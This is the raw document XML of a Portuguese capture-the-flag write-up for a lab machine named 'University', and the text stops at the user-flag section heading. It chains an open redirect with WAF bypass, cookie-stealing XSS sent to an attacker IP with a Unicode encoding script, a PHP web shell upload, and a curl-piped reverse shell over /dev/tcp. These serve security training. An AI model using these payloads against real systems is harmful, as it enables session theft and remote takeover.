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360" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.wqimp56c687t" w:id="0"/>
      <w:bookmarkEnd w:id="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jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans SemiBold" w:cs="IBM Plex Sans SemiBold" w:eastAsia="IBM Plex Sans SemiBold" w:hAnsi="IBM Plex Sans SemiBold"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.qsw8uvkmwc2v" w:id="1"/>
      <w:bookmarkEnd w:id="1"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans SemiBold" w:cs="IBM Plex Sans SemiBold" w:eastAsia="IBM Plex Sans SemiBold" w:hAnsi="IBM Plex Sans SemiBold"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Introdução</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000005">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex San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Este write-up é referente a máquina University. Caso precise de suporte, favor abrir um ticket no </w:t>
      </w:r>
      <w:hyperlink r:id="rId7">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">canal de suporte no servidor do Discord</w:t>
        </w:r>
      </w:hyperlink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007">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans SemiBold" w:cs="IBM Plex Sans SemiBold" w:eastAsia="IBM Plex Sans SemiBold" w:hAnsi="IBM Plex Sans SemiBold"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.lg0s3a59tsxs" w:id="2"/>
      <w:bookmarkEnd w:id="2"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans SemiBold" w:cs="IBM Plex Sans SemiBold" w:eastAsia="IBM Plex Sans SemiBold" w:hAnsi="IBM Plex Sans SemiBold"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Reconhecimento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 enumeração inicial foi realizada com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Nmap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para identificar quais portas estavam abertas na aplicação web.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000A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nmap -p- --open --min-rate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1200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&lt;MACHINE-IP&gt;-sVC -vvv</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000C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color w:val="37474f"/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2120900"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="34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09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Foi identificado que as portas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80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22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estavam abertas. Em seguida, foi realizado o acesso à aplicação web disponível na porta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80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0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3162300"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="36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Após acessar a aplicação web, foi identificada uma funcionalidade de registro disponível na rota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/register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4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3146663"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="35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6663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Com o usuário criado anteriormente, foi possível autenticar na aplicação utilizando a rota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/login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com as credenciais previamente registradas.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000018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2967974"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="38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7974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Após realizar o login na aplicação, as requisições foram interceptadas via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proxy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permitindo identificar alguns parâmetros utilizados pelo sistema.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001C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2594213"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="37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4213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Foi identificado o header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Content-Security-Policy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responsável por definir a política de segurança da aplicação, especificando quais scripts podem ser executados no sistema.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001F">
      <w:pPr>
        <w:spacing w:after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Este header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Content-Security-Policy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(CSP)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define regras de segurança que controlam quais recursos o navegador pode carregar em uma página web. É uma camada importante de proteção contra ataques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XSS (Cross-Site Scripting)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e injeção de código malicioso.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000020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Vamos detalhar cada diretiva:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000021">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:spacing w:after="8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default-src 'self'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before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360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Define a política padrão para todos os tipos de recursos não especificados explicitamente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before="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360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'self'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significa que só permite carregar recursos da mesma origem (mesmo domínio/protocolo/porta)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240" w:before="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360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Bloqueia recursos de domínios externos por padrão</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000025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Content-Security-Policy: default-src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'self'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 script-src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'self' 'unsafe-inline'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 style-src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'self' 'unsafe-inline'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000027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color w:val="37474f"/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914400"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="40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44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Na rota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/next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foi identificado um parâmetro chamado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redirect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responsável por realizar o redirecionamento para outra rota da aplicação.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002B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1104900"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="39" name="image52.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image5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049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Foi identificado o parâmetro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redirect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sendo manipulado com o domínio externo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google.com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como destino. A requisição foi bloqueada pelo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WAF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impedindo a ocorrência de redirecionamento para o domínio externo.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000030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2463800"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="42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38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No entanto, ao utilizar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%09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(caractere de tabulação) (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TAB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), foi possível contornar o bloqueio e realizar o redirecionamento, resultando em um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Open Redirect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para um domínio externo controlado.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000034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lineRule="auto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%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09http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//google.com</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000036">
      <w:pPr>
        <w:spacing w:after="0" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="37474f"/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1041400"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="41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414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1498600"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="45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986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Durante a análise da aplicação web, também foi identificada a funcionalidade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online teacher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que permite a interação com um usuário que esteja online no sistema.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003D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2660888"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="43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0888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Essa funcionalidade permite a interação com outro usuário que esteja online no sistema.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000041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2286000"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="44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60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2780522"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="46" name="image50.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image5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0522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1625600"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="47" name="image46.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image4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56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Como é possível interagir com outro usuário no sistema, surgem possíveis vetores de vulnerabilidades do lado do cliente.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000049">
      <w:pPr>
        <w:spacing w:after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Uma das vulnerabilidades mais comuns nesse cenário é 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XSS (Cross-Site Scripting)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 Injeção de código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javascript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na página.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004A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&lt;script&gt;alert(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);&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004C">
      <w:pPr>
        <w:spacing w:after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color w:val="37474f"/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2737088"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="48" name="image51.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image51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7088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Ao tentar injetar o payload, a requisição foi bloqueada, indicando a presença de um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WAF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na aplicação.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000050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1778000"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="49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80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Como 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CSP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está ativo e define que apenas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scripts do próprio servidor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podem ser executados, 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Open Redirect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identificado pode ser utilizado para realizar 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bypass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dessa política.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000054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Nesse cenário, em vez de apontar diretamente para um domínio externo, a requisição é direcionada para a rota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vulnerável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de redirecionamento, que posteriormente encaminha para o servidor controlado, permitindo contornar a restrição do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CSP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55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img src=x onerror=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"window.location='http://127.0.0.1/next?redirect=%09http%3A%2F%2F10.0.5.109/?=teste'"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57">
      <w:pPr>
        <w:spacing w:after="0" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="37474f"/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3144758"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="50" name="image48.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image48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4758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Mesmo utilizando a tag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img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a requisição ainda foi bloqueada pelo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WAF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5C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1739900"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="51" name="image47.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image47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99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Para realizar o bypass do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WAF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os caracteres do payload foram codificados em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Unicode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permitindo verificar se o filtro ainda seria capaz de bloquear a requisição. Foi utilizado um script em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Python3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para realizar o encode de todos os caracteres do payload.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000060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python3 encode.py</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000062">
      <w:pPr>
        <w:spacing w:after="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color w:val="37474f"/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0" w:lineRule="auto"/>
        <w:jc w:val="both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IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:color w:val="37474f"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="2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import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urllib.parse</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000064">
      <w:pPr>
        <w:spacing w:after="0" w:lineRule="auto"/>
        <w:jc w:val="both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0" w:lineRule="auto"/>
        <w:jc w:val="both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def converter_para_fullwidth_url(texto):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000066">
      <w:pPr>
        <w:spacing w:after="0" w:lineRule="auto"/>
        <w:jc w:val="both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ab/>
        <w:t xml:space="preserve">resultado =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""</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000067">
      <w:pPr>
        <w:spacing w:after="0" w:lineRule="auto"/>
        <w:jc w:val="both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068">
      <w:pPr>
        <w:spacing w:after="0" w:lineRule="auto"/>
        <w:jc w:val="both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for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char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in texto:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000069">
      <w:pPr>
        <w:spacing w:after="0" w:lineRule="auto"/>
        <w:jc w:val="both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  <w:tab/>
        <w:t xml:space="preserve">cp = ord(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char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6A">
      <w:pPr>
        <w:spacing w:after="0" w:lineRule="auto"/>
        <w:jc w:val="both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</w:t>
        <w:tab/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006B">
      <w:pPr>
        <w:spacing w:after="0" w:lineRule="auto"/>
        <w:jc w:val="both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  <w:tab/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cp ==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32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06C">
      <w:pPr>
        <w:spacing w:after="0" w:lineRule="auto"/>
        <w:jc w:val="both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</w:t>
        <w:tab/>
        <w:t xml:space="preserve">fullwidth_char = chr(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0x3000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6D">
      <w:pPr>
        <w:spacing w:after="0" w:lineRule="auto"/>
        <w:jc w:val="both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  <w:tab/>
        <w:t xml:space="preserve">elif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33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&lt;= cp &lt;=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126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06E">
      <w:pPr>
        <w:spacing w:after="0" w:lineRule="auto"/>
        <w:jc w:val="both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</w:t>
        <w:tab/>
        <w:t xml:space="preserve">fullwidth_char = chr(cp +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0xFEE0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6F">
      <w:pPr>
        <w:spacing w:after="0" w:lineRule="auto"/>
        <w:jc w:val="both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  <w:tab/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else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070">
      <w:pPr>
        <w:spacing w:after="0" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="9334e6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</w:t>
        <w:tab/>
        <w:t xml:space="preserve">fullwidth_char =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char</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000071">
      <w:pPr>
        <w:spacing w:after="0" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="9334e6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       </w:t>
        <w:tab/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000072">
      <w:pPr>
        <w:spacing w:after="0" w:lineRule="auto"/>
        <w:jc w:val="both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    </w:t>
        <w:tab/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codificado = urllib.parse.quote(fullwidth_char.encode(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'utf-8'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))</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000073">
      <w:pPr>
        <w:spacing w:after="0" w:lineRule="auto"/>
        <w:jc w:val="both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  <w:tab/>
        <w:t xml:space="preserve">resultado += codificado</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000074">
      <w:pPr>
        <w:spacing w:after="0" w:lineRule="auto"/>
        <w:jc w:val="both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</w:t>
        <w:tab/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000075">
      <w:pPr>
        <w:spacing w:after="0" w:lineRule="auto"/>
        <w:jc w:val="both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return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resultado</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000076">
      <w:pPr>
        <w:spacing w:after="0" w:lineRule="auto"/>
        <w:jc w:val="both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0" w:lineRule="auto"/>
        <w:jc w:val="both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Payload Original: &lt;img src=x onerror=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"window.location='http://127.0.0.1/next?redirect=%09http%3A%2F%2F10.0.5.109/?=teste'"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78">
      <w:pPr>
        <w:spacing w:after="0" w:lineRule="auto"/>
        <w:jc w:val="both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0" w:lineRule="auto"/>
        <w:jc w:val="both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resultado_final = converter_para_fullwidth_url(payload)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007A">
      <w:pPr>
        <w:spacing w:after="0" w:lineRule="auto"/>
        <w:jc w:val="both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0" w:lineRule="auto"/>
        <w:jc w:val="both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print(f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Payload Original: {payload}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")</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007C">
      <w:pPr>
        <w:spacing w:after="0" w:lineRule="auto"/>
        <w:jc w:val="both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print(f"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Payload Encoded:  {resultado_final}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7D">
      <w:pPr>
        <w:spacing w:after="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color w:val="37474f"/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2108200"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="52" name="image49.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image49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82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3225800"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="53" name="image53.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image53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58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O payload completamente codificado foi enviado, aguardando que o servidor realizasse uma requisição para o domínio controlado por meio do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Open Redirect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81">
      <w:pPr>
        <w:spacing w:after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2070100"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="23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01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1054100"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="24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541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 requisição foi recebida com sucesso no servidor controlado. A partir desse ponto, torna-se possível concatenar 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cookie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do usuário na requisição, permitindo sua captura. Com o cookie obtido, é possível realizar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session hijacking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e assumir a sessão do usuário afetado por meio do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XSS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86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&lt;img src=x onerror=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"window.location='http://127.0.0.1/next?redirect=%09http%3A%2F%2F10.0.5.109/?='+document.cookie"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88">
      <w:pPr>
        <w:spacing w:after="0" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="37474f"/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901700"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="25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017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1955800"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="27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58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2362200"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="28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22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O cookie foi obtido com sucesso. Em seguida, bastou substituir o cookie na aplicação web para acessar a sessão e os privilégios do usuário afetado.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008D">
      <w:pPr>
        <w:spacing w:after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1917700"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="29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77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2844800"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="30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48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Com acesso como usuário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admin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foi identificada a rota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/professor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onde existe uma funcionalidade de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file upload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91">
      <w:pPr>
        <w:spacing w:after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2628900"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="31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89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2616200"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="32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62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Ao interceptar a requisição com um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proxy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foi possível alterar a extensão do arquivo para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php.jpeg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permitindo o upload de um arquivo malicioso. O arquivo continha uma função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system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capaz de executar comandos no sistema por meio de um parâmetro fornecido na requisição.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000096">
      <w:pPr>
        <w:spacing w:after="0" w:lineRule="auto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IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:color w:val="37474f"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="2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&lt;?php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000098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system($_GET[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]);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000099">
      <w:pPr>
        <w:spacing w:after="0" w:lineRule="auto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color w:val="37474f"/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2184400"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="33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44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Dessa forma, foi possível executar comandos no sistema, como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id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confirmando a execução remota de comandos.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009C">
      <w:pPr>
        <w:spacing w:after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762000"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="1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20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Em seguida, foi executada uma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reverse shell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 Para isso, foi realizado um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curl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para um servidor controlado, que retornou o arquivo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shell.sh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 Após a execução, a conexão reversa foi recebida na porta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443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9E">
      <w:pPr>
        <w:spacing w:after="0" w:lineRule="auto"/>
        <w:jc w:val="both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IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:color w:val="37474f"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="2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curl &lt;MACHINE-IP&gt;%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2Fshell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.sh | sh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009F">
      <w:pPr>
        <w:spacing w:after="0" w:lineRule="auto"/>
        <w:jc w:val="both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0" w:lineRule="auto"/>
        <w:jc w:val="both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#!/bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A1">
      <w:pPr>
        <w:spacing w:after="0" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="c5221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/bin/bash -c ‘sh -i &gt;&amp; /dev/tcp/&lt;VPN-IP&gt;/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443 0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&gt;&amp;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</w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A2">
      <w:pPr>
        <w:spacing w:after="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color w:val="37474f"/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1485900"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="1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859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990600"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="1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906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1295400"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="1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54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1"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans SemiBold" w:cs="IBM Plex Sans SemiBold" w:eastAsia="IBM Plex Sans SemiBold" w:hAnsi="IBM Plex Sans SemiBold"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.lyvd8bsy62eu" w:id="3"/>
      <w:bookmarkEnd w:id="3"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans SemiBold" w:cs="IBM Plex Sans SemiBold" w:eastAsia="IBM Plex Sans SemiBold" w:hAnsi="IBM Plex Sans SemiBold"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Exploração - obtendo a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans SemiBold" w:cs="IBM Plex Sans SemiBold" w:eastAsia="IBM Plex Sans SemiBold" w:hAnsi="IBM Plex Sans SemiBold"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">user flag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240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
